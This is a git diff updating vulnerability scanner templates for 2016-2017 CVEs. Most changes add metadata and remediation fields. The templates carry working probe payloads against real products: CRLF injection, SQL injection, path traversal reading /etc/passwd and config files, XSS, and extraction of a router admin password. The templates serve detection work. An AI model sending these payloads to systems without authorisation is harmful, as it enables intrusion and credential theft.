CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-4975 cwe-id: CWE-93 - tags: cve,cve2016,crlf,generic,apache + epss-score: 0.00428 + epss-percentile: 0.71577 + cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: http_server + tags: cve,cve2016,crlf,apache http: - method: GET path: - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" + matchers: - type: regex part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' -# Enhanced by cs on 2022/02/14 +# digest: 4a0a004730450221008b4387eeabe359041a2b70d64e4f5c4b37fb97bf9c361972adca630dd9deb54502203c07ef84741819ad5a1e2040d6962aabb6832c42d84a72616273bfb1a8f0d070:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index 14915babc9..0de9169fa0 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -5,20 +5,26 @@ info: author: princechaddha severity: high description: Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type. + remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later. reference: - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md - https://tanzu.vmware.com/security/cve-2016-4977 - https://nvd.nist.gov/vuln/detail/CVE-2016-4977 - https://pivotal.io/security/cve-2016-4977 - remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later. + - http://www.openwall.com/lists/oss-security/2019/10/16/1 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2016-4977 cwe-id: CWE-19 - tags: oauth2,oauth,rce,ssti,vulhub,cve,cve2016,spring + epss-score: 0.03345 + epss-percentile: 0.90291 + cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: pivotal + product: spring_security_oauth + tags: oauth2,oauth,rce,ssti,vulhub,cve,cve2016,spring http: - method: GET @@ -36,4 +42,4 @@ http: status: - 400 -# Enhanced by mp on 2022/04/04 +# digest: 4b0a00483046022100c83a9ff72e8ecd93535ea357cd209b316306ce4223c52ac5d7910a74ae508de8022100c7535cdb22cfaf810af0cfb09f0b94756aa0c06c5e70720a90ceb91813640079:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index df16e9116c..d0e86a9fbe 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -5,6 +5,8 @@ info: author: suman_kar severity: critical description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. + remediation: | + Update the router firmware to the latest version, which includes a fix for the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2016-5649 - https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html @@ -13,10 +15,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-5649 - cwe-id: CWE-200 - tags: cve,cve2016,iot,netgear,router,packetstorm + cwe-id: CWE-200,CWE-319 + epss-score: 0.15681 + epss-percentile: 0.95316 + cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: dgn2200_firmware + tags: cve,cve2016,iot,netgear,router,packetstorm http: - raw: @@ -27,21 +34,21 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - "Smart Wizard Result " + - type: status status: - 200 - - type: word - words: - - "Smart Wizard Result " - part: body - extractors: - type: regex name: password - part: body group: 1 regex: - 'Success "([a-z]+)"' + part: body -# Enhanced by mp on 2022/05/10 +# digest: 4a0a004730450220054665c1517ddd8c6410ec44797773a6ed535ecdbf2f56921eac4e25a5e73d120221008640b2db610760ea9a838b8466b41699ff16dc572af82e06f56c7f080b277cb7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 59edb97f43..baf7eb5afb 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -3,23 +3,31 @@ id: CVE-2016-6195 info: name: vBulletin <= 4.2.3 - SQL Injection author: MaStErChO - severity: high + severity: critical description: | vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database. + remediation: | + Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor. reference: - https://www.cvedetails.com/cve/CVE-2016-6195/ - https://www.exploit-db.com/exploits/38489 - - https://www.securityfocus.com/bid/94312 - https://enumerated.wordpress.com/2016/07/11/1/ + - http://www.vbulletin.org/forum/showthread.php?t=322848 + - https://github.com/drewlong/vbully classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-6195 cwe-id: CWE-89 + epss-score: 0.00284 + epss-percentile: 0.65135 + cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* metadata: - max-request: 6 - shodan-query: title:"Powered By vBulletin" verified: "true" + max-request: 6 + vendor: vbulletin + product: vbulletin + shodan-query: title:"Powered By vBulletin" tags: cve,cve2016,vbulletin,sqli,forum,edb http: @@ -33,6 +41,7 @@ http: - "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -45,3 +54,5 @@ http: - 200 - 503 condition: or + +# digest: 4b0a00483046022100f8098776dafb488953c6f3023b5f44910fe6bae3d18d25435c1ce8b067160599022100bc02c7103bd1e1e9fb04ed2b25f89577602ecac30d85c2d999d773db2aa26d11:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index c957708dad..4582617da0 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -5,19 +5,27 @@ info: author: pikpikcu severity: high description: NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. + remediation: | + Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 - http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://www.kb.cert.org/vuls/id/582384 + - http://kb.netgear.com/000036386/CVE-2016-582384 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2016-6277 cwe-id: CWE-352 - tags: cve,cve2016,netgear,rce,iot,kev + epss-score: 0.97471 + epss-percentile: 0.99957 + cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: d6220_firmware + tags: cve,cve2016,netgear,rce,iot,kev http: - method: GET @@ -26,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/09 +# digest: 4a0a00473045022100de20c3d620127c54280d027571404ea4c1cd7153785d796efde5372aaa159fd40220049d5aaf80b861b9468bef68ef519f693800d3dbee70944fd7cf15a13b46079d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index 5ac5fb9017..ad5ee9fe75 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -5,18 +5,27 @@ info: author: 0x_Akoko severity: high description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile. + remediation: | + Upgrade to ZOHO WebNMS Framework version 5.2 SP1 or later to mitigate this vulnerability. reference: - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt - https://www.exploit-db.com/exploits/40229/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6601 + - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_cred_disclosure + - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_file_download classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-6601 cwe-id: CWE-22 - tags: edb,cve,cve2016,zoho,lfi,webnms + epss-score: 0.97523 + epss-percentile: 0.99986 + cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zohocorp + product: webnms_framework + tags: edb,cve,cve2016,zoho,lfi,webnms http: - method: GET @@ -33,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2023/01/15 +# digest: 4b0a00483046022100cd846c7a68558ee7f7e3d69e223c38fa33460265be2802ef4365dc731cefd79b02210099e9d75f6f8d9bf761bfb1ad532dad3dad9904c12823c7e2c63de11e606913c6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index 5049574c59..416427f34f 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -5,34 +5,43 @@ info: author: dwisiswant0 severity: critical description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. + remediation: | + Apply the necessary patch or update provided by Trend Micro to fix the authentication bypass vulnerability. reference: - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 - https://nvd.nist.gov/vuln/detail/CVE-2016-7552 - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6 - - http://web.archive.org/web/20210516181625/https://www.securityfocus.com/bid/97599 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-7552 cwe-id: CWE-22 - tags: msf,cve,cve2016,lfi,auth,bypass + epss-score: 0.97004 + epss-percentile: 0.99651 + cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* metadata: max-request: 1 + vendor: trendmicro + product: threat_discovery_appliance + tags: msf,cve,cve2016,lfi,auth,bypass http: - method: GET path: - "{{BaseURL}}/cgi-bin/logoff.cgi" + headers: Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf" + matchers-condition: and matchers: + - type: word + part: body + words: + - "Memory map" + - type: status status: - 200 - - type: word - words: - - "Memory map" - part: body -# Enhanced by mp on 2022/05/10 +# digest: 490a00463044022058ae272552811d1cd36be690c38e0812742c7c8904619bbcba513c446963789702200df001af528f84c798762c91344a2450adff89fca7ae8ee90aa0ec3f8b2978db:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 6dcd009a41..cbeec748f9 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -6,21 +6,27 @@ info: severity: high description: | Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials. + remediation: | + Upgrade to the latest version of the firmware provided by Sony. reference: - https://sec-consult.com/vulnerability-lab/advisory/backdoor-vulnerability-in-sony-ipela-engine-ip-cameras/ - https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/ - https://jvn.jp/en/vu/JVNVU96435227/index.html - https://nvd.nist.gov/vuln/detail/CVE-2016-7834 - remediation: | - Upgrade to the latest version of the firmware provided by Sony. + - https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras classification: cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2016-7834 cwe-id: CWE-200 - tags: sony,backdoor,unauth,telnet,iot,camera + epss-score: 0.00202 + epss-percentile: 0.57937 + cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sony + product: snc_series_firmware + tags: sony,backdoor,unauth,telnet,iot,camera http: - method: GET @@ -43,4 +49,4 @@ http: status: - 204 -# Enhanced by cs 09/23/2022 +# digest: 4b0a00483046022100c079b44867df13dcee4c876bfab97dd02d45bd3ffbb8b26fb01ca07e28596817022100a1be8cfaa42992e8696323a7758a082f31dfce854c19a74ac61e02d403aee415:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 32aa3dfebe..9477c4a885 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -6,19 +6,27 @@ info: severity: medium description: | SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action. + remediation: | + Upgrade SPIP to version 3.1.2 or later to mitigate this vulnerability. reference: - https://core.spip.net/projects/spip/repository/revisions/23202 - https://core.spip.net/projects/spip/repository/revisions/23201 - https://core.spip.net/projects/spip/repository/revisions/23200 - https://nvd.nist.gov/vuln/detail/CVE-2016-7981 + - http://www.openwall.com/lists/oss-security/2016/10/05/17 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-7981 cwe-id: CWE-79 - tags: cve,cve2016,xss,spip + epss-score: 0.00258 + epss-percentile: 0.63297 + cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: spip + product: spip + tags: cve,cve2016,xss,spip http: - method: GET @@ -28,17 +36,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '">' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html -# Enhanced by mp on 2022/08/12 + - type: status + status: + - 200 + +# digest: 4a0a0047304502203722061edbea61dd4f16aef82921315ece50daeaf2727788a75f2d884d96305b02210087c064b638ba8a6dfd4377e5822a92bd976931ea16325e0f5e922b91643db396:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index c3abfeccd6..d0d2982ad7 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting. + remediation: | + Upgrade Aruba Airwave to version 8.2.3.1 or later to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/41482 - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt @@ -15,9 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-8527 cwe-id: CWE-79 - tags: cve2016,aruba,xss,edb,cve + epss-score: 0.0024 + epss-percentile: 0.61778 + cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: hp + product: airwave + tags: cve2016,aruba,xss,edb,cve http: - method: GET @@ -26,19 +33,18 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "" - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html -# Enhanced by mp on 2022/08/18 + - type: status + status: + - 200 + +# digest: 490a0046304402201add2de236807280228f54dd4758d61caef78c96186e7c3975f344b3881e9fba022058f689f864496f13b70f11b2a5d390a36f1ba2f8fc060d0d43c345eac38a2cd0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index ff6b246328..6167dc86a4 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -5,6 +5,8 @@ info: author: charanrayudu,meme-lord severity: high description: DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources. + remediation: | + Upgrade DotNetNuke (DNN) ImageHandler to version 9.2.0 or above. reference: - https://hackerone.com/reports/482634 - https://nvd.nist.gov/vuln/detail/CVE-2017-0929 @@ -14,9 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2017-0929 cwe-id: CWE-918 - tags: dnn,dotnetnuke,hackerone,cve,cve2017,oast,ssrf + epss-score: 0.03588 + epss-percentile: 0.90586 + cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dnnsoftware + product: dotnetnuke + tags: dnn,dotnetnuke,hackerone,cve,cve2017,oast,ssrf http: - method: GET @@ -34,4 +41,4 @@ http: status: - 500 -# Enhanced by mp on 2022/06/09 +# digest: 4a0a00473045022033c07782b19fc05ef52e53223219547de433778503b292b50e49c57d2320f615022100bb10f63aab13ac54e2fe308348755d08e8d27f25db9293c0e790da584ef2ce51:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index 4bd38b9548..0d36bac385 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu,daffainfo severity: high description: Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests. + remediation: | + Apply the necessary patches or updates provided by Oracle to fix the LFI vulnerability in GlassFish Server. reference: - https://www.exploit-db.com/exploits/45196 - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822 @@ -16,9 +18,14 @@ info: cvss-score: 7.5 cve-id: CVE-2017-1000028 cwe-id: CWE-22 - tags: oracle,glassfish,lfi,edb,cve,cve2017 + epss-score: 0.97516 + epss-percentile: 0.99982 + cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:* metadata: max-request: 2 + vendor: oracle + product: glassfish_server + tags: oracle,glassfish,lfi,edb,cve,cve2017 http: - method: GET @@ -27,6 +34,7 @@ http: - "{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini" stop-at-first-match: true + matchers-condition: or matchers: - type: dsl @@ -43,4 +51,4 @@ http: - "status_code == 200" condition: and -# Enhanced by mp on 2022/06/09 +# digest: 4a0a0047304502201ff04528d00a2f5b2dbd3609d2d356dbe771360fbe08d230517c59ab78da9c2c022100a27a189e49cf2801bfd31a32b47fe38743e259e2764189557c6e48b96fb90931:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index cce0722b83..77eca46c6a 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server. + remediation: | + Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server. reference: - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784 - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037 @@ -14,9 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2017-1000029 cwe-id: CWE-200 - tags: cve,cve2017,glassfish,oracle,lfi + epss-score: 0.00387 + epss-percentile: 0.70176 + cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:* metadata: max-request: 1 + vendor: oracle + product: glassfish_server + tags: cve,cve2017,glassfish,oracle,lfi http: - method: GET @@ -33,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/10/24 +# digest: 4b0a0048304602210092ca2c021d27c2a63652e130a5e6a439180197980af256a8711693420e6c25a402210090b691c58fe23daba6918059618de57d8c34a2fde5b39abdd630e1771b3fb95e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 7baf2778a1..29f25229d9 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Phoenix Framework versions 1.0.0 through 1.0.4, 1.1.0 through 1.1.6, 1.2.0, 1.2.2 and 1.3.0-rc.0 contain an open redirect vulnerability, which may result in phishing or social engineering attacks. + remediation: | + Apply the latest security patches or upgrade to a patched version of the Phoenix Framework. reference: - https://elixirforum.com/t/security-releases-for-phoenix/4143 - https://vuldb.com/?id.109587 @@ -14,20 +16,24 @@ info: cvss-score: 6.1 cve-id: CVE-2017-1000163 cwe-id: CWE-601 - tags: cve,cve2017,redirect,phoenix + epss-score: 0.00154 + epss-percentile: 0.51569 + cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: phoenixframework + product: phoenix + tags: cve,cve2017,redirect,phoenix http: - method: GET - path: - '{{BaseURL}}/?redirect=/\interact.sh' matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' - part: header -# Enhanced by md on 2023/02/08 +# digest: 4a0a00473045022100ae9fecd95f3b944c64dca35200bb0b2011547285514a4e9ccca83be341ae17fb02202790d207b943e969cbcb671a851c256328bc83644d621b3fad6b5d1e83d06345:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index f5b037eb72..d4c6711db5 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree. + remediation: | + Update to the latest version of Delightful Downloads plugin or apply the patch provided by the vendor. reference: - https://www.exploit-db.com/exploits/49693 - https://github.com/jqueryfiletree/jqueryfiletree/issues/66 @@ -15,27 +17,33 @@ info: cvss-score: 7.5 cve-id: CVE-2017-1000170 cwe-id: CWE-22 + epss-score: 0.70305 + epss-percentile: 0.97662 cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:* - epss-score: 0.74745 - tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery,edb,packetstorm metadata: max-request: 1 + vendor: jqueryfiletree_project + product: jqueryfiletree + tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery,edb,packetstorm http: - method: POST path: - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php" + body: "dir=%2Fetc%2F&onlyFiles=true" + matchers-condition: and matchers: - type: word + part: body words: - "
  • " - "passwd
    • " condition: and - part: body + - type: status status: - 200 -# Enhanced by mp on 2022/06/09 +# digest: 4b0a00483046022100ecb412d6648d675152488361048b0c9fe4d213322afe4eb5eb0f2c080d4ecedc022100f7e010784567394f5a5248baa5581af71bd70c5829235272b1c8f84c607799d5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index 9fe1228135..ae722ea683 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -5,19 +5,27 @@ info: author: Moritz Nentwig severity: critical description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution. + remediation: | + Apply the latest security patches or upgrade to a newer version of the Primetek Primefaces application. reference: - https://github.com/mogwailabs/CVE-2017-1000486 - https://github.com/pimps/CVE-2017-1000486 - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486 + - https://cryptosense.com/weak-encryption-flaw-in-primefaces/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-1000486 cwe-id: CWE-326 - tags: cve,cve2017,primetek,rce,injection,kev + epss-score: 0.96894 + epss-percentile: 0.9961 + cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: primetek + product: primefaces + tags: cve,cve2017,primetek,rce,injection,kev http: - raw: @@ -32,8 +40,8 @@ http: matchers: - type: word + part: header words: - 'Mogwailabs: CHECKCHECK' - part: header -# Enhanced by mp on 2022/05/10 +# digest: 4a0a00473045022035114b153eac41333d38f72a01f0fb868ef35212738a5dcb875ad453e96959e1022100d12d2ab0467eebc66977a679d5d96a8d075bfc2f8812e9be056ca297f5272f5f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index 9fe9e66a87..af5b7ade7a 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -6,18 +6,26 @@ info: severity: high description: | Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site. + remediation: | + Apply the latest security patches provided by Oracle to fix this vulnerability. reference: - http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html - http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940 - https://nvd.nist.gov/vuln/detail/CVE-2017-10075 + - http://www.securitytracker.com/id/1038940 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2017-10075 + epss-score: 0.00409 + epss-percentile: 0.70967 + cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:* metadata: - max-request: 2 - google-query: inurl:"/cs/idcplg" verified: true + max-request: 2 + vendor: oracle + product: webcenter_content + google-query: inurl:"/cs/idcplg" tags: cve,cve2017,xss,oracle http: @@ -27,6 +35,7 @@ http: - "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -45,4 +54,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/12 +# digest: 4a0a00473045022044b66b4d061259943e709c02e6f681181cd7ea69534a7eb8df68d60eecd3fe1f022100ff693788ba66f50537e0960474b86294890f801499784e56e39e8de7d6af50b4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index 53753d5141..d1c87f13fd 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -6,18 +6,26 @@ info: severity: high description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. + remediation: | + Apply the latest security patches provided by 